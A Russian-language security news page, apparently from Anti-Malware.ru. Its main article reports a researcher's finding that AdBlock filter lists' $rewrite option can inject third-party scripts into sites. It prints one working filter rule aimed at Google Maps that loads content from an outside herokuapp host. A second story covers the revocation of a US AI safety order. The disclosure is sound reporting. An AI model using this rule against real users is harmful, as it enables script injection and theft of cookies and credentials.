Фильтры AdBlock можно использовать для инъекции вредоносных скриптов

Фильтры AdBlock можно использовать для инъекции вредоносных скриптов

Фильтры AdBlock можно использовать для инъекции вредоносных скриптов

Новый эксплойт, недавно обнаруженный экспертом в области кибербезопасности, способен использовать фильтры популярных блокировщиков рекламы Adblock Plus, AdBlock и uBlocker для инъекции сторонних скриптов в код страниц веб-сайтов.

Adblock Plus, AdBlock и uBlocker представляют собой специальные расширения для браузеров, помогающие пользователям скрывать надоедливую и агрессивную рекламу со страниц ресурсов.

База пользователей этих блокировщиков насчитывает более 10 миллионов человек. Таким образом, если злоумышленнику удастся внедрить вредоносные скрипты, он получит возможность красть файлы cookie, учетные данные, а также осуществлять нужные ему редиректы.

Работа блокировщиков рекламы завязана на использовании списка URL, на которых был отмечен рекламный контент или даже вредоносное поведение. Тот же Adblock Plus, например, запрещает браузеру подключаться к этим ссылкам, следовательно, рекламные скрипты не в состоянии загрузиться.

Вся проблема кроется в опции списка фильтров под названием $rewrite, которая была представлена в 2018 году (в Adblocker Plus 3.2). Эта функция позволяет разработчику подменить запрос, совпадающий с определенным регулярным выражением, другим URL.

Единственное условие — заменяемая строка должна быть относительным URL-адресом. Таким образом, если запрос для example.com/ad.gif заменить на example.com/puppies.gif, пользователь вместо рекламы увидит картинку с милыми щенками.

При этом разработчики предусмотрели защиту, запретив запросы вида SCRIPT, SUBDOCUMENT, OBJECT и OBJECT_SUBREQUEST — с ними эта функция не будет работать.

Однако исследователь Армин Себастьян нашел способ, позволяющий создать правило, благодаря которому сторонний скрипт можно встроить в контент конкретного сайта.

Для этого потребуется найти ресурс, который допускает загрузку скриптов со сторонних доменов, а также использует XMLHttpRequest или Fetch для загрузки скриптов. Сам Себастьян довольно быстро нашел такой ресурс — он использовал Google Maps для демонстрации уязвимости.

Google Maps использует XMLHttpRequest для загрузки скриптов, что позволило эксперту воспользоваться функцией фильтров $rewrite для задействования скрипта со стороннего домена. Пример:

/^https://www.google.com/maps/_/js/k=.*/m=pw/.*/rs=.*/$rewrite=/search?hl=en-US&source=hp&biw=&bih=&q=majestic-ramsons.herokuapp.com&btnI=I%27m+Feeling+Lucky&gbv=1

Если пользователь в этом случае посетит google[.]com/maps/, фильтр использует редиректы Google для считывания контента с majestic-ramsons.herokuapp[.]com/.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Дональд Трамп отменил директиву по безопасности ИИ прежней администрации

Президент США Дональд Трамп отменил указ Джо Байдена от октября 2023 года, обязывающий разработчиков продвинутых систем искусственного интеллекта (ИИ) делиться с правительством результатами тестирования на безопасность и защиту технологий.

Этот указ акцентировал внимание на применении ИИ в экономике, общественной безопасности и здравоохранении, а также предусматривал разработку стандартов для снижения рисков в химической, биологической, ядерной и кибербезопасности, связанных с генеративным ИИ.

Инцидент в Лас-Вегасе 1 января 2025 года, когда злоумышленник взорвал электромобиль, пользуясь подсказками генеративного ИИ, продемонстрировал, что преступные группы начали активно осваивать эту технологию. Эксперты прогнозируют, что число подобных преступлений может значительно вырасти в ближайшие месяцы.

Кроме того, указ Байдена включал меры по борьбе с дипфейками и предписывал облачным провайдерам уведомлять власти о зарубежных клиентах. Однако эти инициативы вызвали резкую критику со стороны Республиканской партии, отмечает Reuters.

В партийной платформе 2024 года эти меры были названы «тормозом для технического прогресса». Из-за сопротивления республиканцев в Конгрессе и Сенате администрация Байдена не смогла утвердить данные инициативы в виде закона, что вынудило ее прибегнуть к указам.

«Республиканцы поддерживают развитие искусственного интеллекта, основанное на принципах свободы слова и процветания человека», — говорилось в программном документе партии, с которым Дональд Трамп шел на выборы.

Отмена указа Байдена стала одним из предвыборных обещаний Трампа. По мнению экспертов, опрошенных агентством Reuters, новая администрация сосредоточится на стимулировании инноваций и снижении регулирования в сфере высоких технологий, включая ИИ.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru